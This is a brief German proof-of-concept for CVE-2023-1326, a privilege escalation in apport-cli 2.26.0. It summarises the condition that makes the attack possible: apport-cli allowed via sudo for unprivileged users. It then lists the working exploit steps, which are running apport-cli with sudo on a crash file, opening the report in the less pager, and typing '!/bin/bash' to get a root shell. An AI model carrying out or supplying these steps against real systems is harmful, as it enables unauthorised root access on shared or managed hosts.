
Dies ist ein eigener grundlegender Proof-of-Concept für die Schwachstelle CVE-2023-1326
Ein Proof of Concept für CVE-2023–1326 in apport-cli 2.26.0
Diese Schwachstelle ist eine Privilegieneskalation in apport-cli 2.26.0, ähnlich wie CVE-2023–26604, funktioniert diese Schwachstelle jedoch nur, wenn sie in sudoers zugewiesen ist:

Ein Privilegieneskalationsangriff wurde in apport-cli 2.26.0 und früher gefunden, der CVE-2023-26604 ähnelt. Wenn ein System speziell konfiguriert ist, um unprivilegierten Benutzern die Ausführung von sudo apport-cli zu erlauben, less als Pager konfiguriert ist und die Terminalgröße festgelegt werden kann, kann ein lokaler Angreifer die Privilegien eskalieren.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
drücke V (Bericht anzeigen)
!/bin/bash
